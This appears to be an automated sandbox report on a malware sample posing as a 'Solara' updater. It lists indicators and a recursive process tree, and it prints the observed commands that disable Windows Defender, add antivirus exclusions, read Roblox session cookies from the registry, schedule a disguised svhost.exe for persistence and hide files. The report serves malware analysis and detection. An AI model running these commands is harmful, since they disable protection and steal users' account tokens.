1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2748	Loader.exe
Token: SeDebugPrivilege	4680	XClient.exe
Token: SeDebugPrivilege	4484	RustCheat.exe
Token: SeIncreaseQuotaPrivilege	3316	wmic.exe
Token: SeSecurityPrivilege	3316	wmic.exe
Token: SeTakeOwnershipPrivilege	3316	wmic.exe
Token: SeLoadDriverPrivilege	3316	wmic.exe
Token: SeSystemProfilePrivilege	3316	wmic.exe
Token: SeSystemtimePrivilege	3316	wmic.exe
Token: SeProfSingleProcessPrivilege	3316	wmic.exe
Token: SeIncBasePriorityPrivilege	3316	wmic.exe
Token: SeCreatePagefilePrivilege	3316	wmic.exe
Token: SeBackupPrivilege	3316	wmic.exe
Token: SeRestorePrivilege	3316	wmic.exe
Token: SeShutdownPrivilege	3316	wmic.exe
Token: SeDebugPrivilege	3316	wmic.exe
Token: SeSystemEnvironmentPrivilege	3316	wmic.exe
Token: SeRemoteShutdownPrivilege	3316	wmic.exe
Token: SeUndockPrivilege	3316	wmic.exe
Token: SeManageVolumePrivilege	3316	wmic.exe
Token: 33	3316	wmic.exe
Token: 34	3316	wmic.exe
Token: 35	3316	wmic.exe
Token: 36	3316	wmic.exe
Token: SeIncreaseQuotaPrivilege	3316	wmic.exe
Token: SeSecurityPrivilege	3316	wmic.exe
Token: SeTakeOwnershipPrivilege	3316	wmic.exe
Token: SeLoadDriverPrivilege	3316	wmic.exe
Token: SeSystemProfilePrivilege	3316	wmic.exe
Token: SeSystemtimePrivilege	3316	wmic.exe
Token: SeProfSingleProcessPrivilege	3316	wmic.exe
Token: SeIncBasePriorityPrivilege	3316	wmic.exe
Token: SeCreatePagefilePrivilege	3316	wmic.exe
Token: SeBackupPrivilege	3316	wmic.exe
Token: SeRestorePrivilege	3316	wmic.exe
Token: SeShutdownPrivilege	3316	wmic.exe
Token: SeDebugPrivilege	3316	wmic.exe
Token: SeSystemEnvironmentPrivilege	3316	wmic.exe
Token: SeRemoteShutdownPrivilege	3316	wmic.exe
Token: SeUndockPrivilege	3316	wmic.exe
Token: SeManageVolumePrivilege	3316	wmic.exe
Token: 33	3316	wmic.exe
Token: 34	3316	wmic.exe
Token: 35	3316	wmic.exe
Token: 36	3316	wmic.exe
Token: SeDebugPrivilege	4876	Loader.exe
Token: SeDebugPrivilege	1544	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	2332	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	1312	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	1628	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	1416	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	3468	dllhost.exe
Token: SeDebugPrivilege	3060	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	1872	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	2748	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	2444	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	4404	XClient.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	3548	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	1268	Loader.exe
Token: SeIncreaseQuotaPrivilege	2544	wmic.exe
Token: SeSecurityPrivilege	2544	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1608 wrote to memory of 2748	1608	Solara_Updater.exe	87
PID 1608 wrote to memory of 2748	1608	Solara_Updater.exe	87
PID 1608 wrote to memory of 3800	1608	Solara_Updater.exe	88
PID 1608 wrote to memory of 3800	1608	Solara_Updater.exe	88
PID 1608 wrote to memory of 3800	1608	Solara_Updater.exe	88
PID 1608 wrote to memory of 4772	1608	Solara_Updater.exe	89
PID 1608 wrote to memory of 4772	1608	Solara_Updater.exe	89
PID 3800 wrote to memory of 3392	3800	sol.exe	90
PID 3800 wrote to memory of 3392	3800	sol.exe	90
PID 3800 wrote to memory of 3392	3800	sol.exe	90
PID 4772 wrote to memory of 2456	4772	Solara_Updater.exe	97
PID 4772 wrote to memory of 2456	4772	Solara_Updater.exe	97
PID 4772 wrote to memory of 440	4772	Solara_Updater.exe	98
PID 4772 wrote to memory of 440	4772	Solara_Updater.exe	98
PID 4772 wrote to memory of 440	4772	Solara_Updater.exe	98
PID 4772 wrote to memory of 2612	4772	Solara_Updater.exe	99
PID 4772 wrote to memory of 2612	4772	Solara_Updater.exe	99
PID 440 wrote to memory of 1048	440	sol.exe	100
PID 440 wrote to memory of 1048	440	sol.exe	100
PID 440 wrote to memory of 1048	440	sol.exe	100
PID 2612 wrote to memory of 3460	2612	Solara_Updater.exe	101
PID 2612 wrote to memory of 3460	2612	Solara_Updater.exe	101
PID 2612 wrote to memory of 3720	2612	Solara_Updater.exe	102
PID 2612 wrote to memory of 3720	2612	Solara_Updater.exe	102
PID 2612 wrote to memory of 3720	2612	Solara_Updater.exe	102
PID 2612 wrote to memory of 4536	2612	Solara_Updater.exe	103
PID 2612 wrote to memory of 4536	2612	Solara_Updater.exe	103
PID 3720 wrote to memory of 4804	3720	sol.exe	104
PID 3720 wrote to memory of 4804	3720	sol.exe	104
PID 3720 wrote to memory of 4804	3720	sol.exe	104
PID 4536 wrote to memory of 4300	4536	Solara_Updater.exe	106
PID 4536 wrote to memory of 4300	4536	Solara_Updater.exe	106
PID 4536 wrote to memory of 4600	4536	Solara_Updater.exe	107
PID 4536 wrote to memory of 4600	4536	Solara_Updater.exe	107
PID 4536 wrote to memory of 4600	4536	Solara_Updater.exe	107
PID 4536 wrote to memory of 4336	4536	Solara_Updater.exe	108
PID 4536 wrote to memory of 4336	4536	Solara_Updater.exe	108
PID 4600 wrote to memory of 432	4600	sol.exe	109
PID 4600 wrote to memory of 432	4600	sol.exe	109
PID 4600 wrote to memory of 432	4600	sol.exe	109
PID 4336 wrote to memory of 5008	4336	Solara_Updater.exe	112
PID 4336 wrote to memory of 5008	4336	Solara_Updater.exe	112
PID 4336 wrote to memory of 1428	4336	Solara_Updater.exe	113
PID 4336 wrote to memory of 1428	4336	Solara_Updater.exe	113
PID 4336 wrote to memory of 1428	4336	Solara_Updater.exe	113
PID 4336 wrote to memory of 752	4336	Solara_Updater.exe	114
PID 4336 wrote to memory of 752	4336	Solara_Updater.exe	114
PID 1428 wrote to memory of 3292	1428	sol.exe	115
PID 1428 wrote to memory of 3292	1428	sol.exe	115
PID 1428 wrote to memory of 3292	1428	sol.exe	115
PID 752 wrote to memory of 4108	752	Solara_Updater.exe	116
PID 752 wrote to memory of 4108	752	Solara_Updater.exe	116
PID 752 wrote to memory of 716	752	Solara_Updater.exe	117
PID 752 wrote to memory of 716	752	Solara_Updater.exe	117
PID 752 wrote to memory of 716	752	Solara_Updater.exe	117
PID 752 wrote to memory of 440	752	Solara_Updater.exe	118
PID 752 wrote to memory of 440	752	Solara_Updater.exe	118
PID 716 wrote to memory of 1132	716	sol.exe	119
PID 716 wrote to memory of 1132	716	sol.exe	119
PID 716 wrote to memory of 1132	716	sol.exe	119
PID 440 wrote to memory of 4512	440	Solara_Updater.exe	120
PID 440 wrote to memory of 4512	440	Solara_Updater.exe	120
PID 440 wrote to memory of 3216	440	Solara_Updater.exe	121
PID 440 wrote to memory of 3216	440	Solara_Updater.exe	121

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3132	attrib.exe
64	attrib.exe
4652	attrib.exe
1332	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1608
- C:\Users\Admin\AppData\Local\Temp\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2748
- - C:\Users\Admin\AppData\Local\Temp\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:4680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2488
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"
      4⤵
      Creates scheduled task(s)
      PID:3108
- - C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
    "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4484
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3316
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
      4⤵
      Views/modifies file attributes
      PID:3132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2796
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2544
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:2184
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:2436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      PID:244
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3460
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
      4⤵
      PID:2184
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        Runs ping.exe
        
        PID:3552
- C:\Users\Admin\AppData\Local\Temp\sol.exe
  "C:\Users\Admin\AppData\Local\Temp\sol.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3800
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
    3⤵
    - Checks computer location settings
    PID:3392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
      4⤵
      PID:4344
    - - C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        5⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1544
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tejp1arj\tejp1arj.cmdline"
        6⤵
        Drops file in System32 directory
        
        PID:4116
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9AD.tmp" "c:\Windows\System32\CSCE69E4374B24ADDAA77E06DBDD789F.TMP"
        7⤵
        
        PID:5004
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GPDMFLg4ZD.bat"
        6⤵
        
        PID:3728
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:3624
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:4900
        
        C:\Recovery\WindowsRE\dllhost.exe
        
        "C:\Recovery\WindowsRE\dllhost.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3468
- C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
  "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4772
- - C:\Users\Admin\AppData\Local\Temp\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
    3⤵
    - Executes dropped EXE
    PID:2456
- - C:\Users\Admin\AppData\Local\Temp\sol.exe
    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:440
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
      4⤵
      PID:1048
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        5⤵
        
        PID:2316
      - C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
- - C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2612
  - - C:\Users\Admin\AppData\Local\Temp\Loader.exe
      "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
      4⤵
      Executes dropped EXE
      PID:3460
  - - C:\Users\Admin\AppData\Local\Temp\sol.exe
      "C:\Users\Admin\AppData\Local\Temp\sol.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3720
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        5⤵
        
        PID:4804
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        6⤵
        
        PID:4692
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1312
  - - C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4536
    - - C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        5⤵
        Executes dropped EXE
        
        PID:4300
    - - C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        5⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4600
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        6⤵
        
        PID:432
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        7⤵
        
        PID:4268
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1628
    - - C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4336
      - C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        6⤵
        Executes dropped EXE
        
        PID:5008
      - C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:1428
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        7⤵
        Checks computer location settings
        
        PID:3292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        8⤵
        
        PID:5088
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1416
      - C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:752
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        7⤵
        Executes dropped EXE
        
        PID:4108
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        7⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:716
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        8⤵
        
        PID:1132
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        9⤵
        
        PID:4320
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:440
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        8⤵
        Executes dropped EXE
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        8⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3216
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        9⤵
        Checks computer location settings
        
        PID:3644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        10⤵
        
        PID:2316
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1872
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        8⤵
        Checks computer location settings
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        9⤵
        Executes dropped EXE
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:3316
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        10⤵
        Checks computer location settings
        
        PID:3992
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        11⤵
        
        PID:4692
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        9⤵
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        10⤵
        Executes dropped EXE
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        10⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4236
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        11⤵
        
        PID:1428
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        12⤵
        
        PID:644
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        10⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        11⤵
        Executes dropped EXE
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:1628
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        12⤵
        
        PID:3552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        13⤵
        
        PID:4512
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        14⤵
        Executes dropped EXE
        
        PID:3252
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        11⤵
        Checks computer location settings
        
        PID:1012
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        13⤵
        Executes dropped EXE
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        12⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:388
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        13⤵
        Checks computer location settings
        
        PID:4408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        14⤵
        
        PID:3800
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        15⤵
        Executes dropped EXE
        
        PID:3644
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        12⤵
        
        PID:4948
        
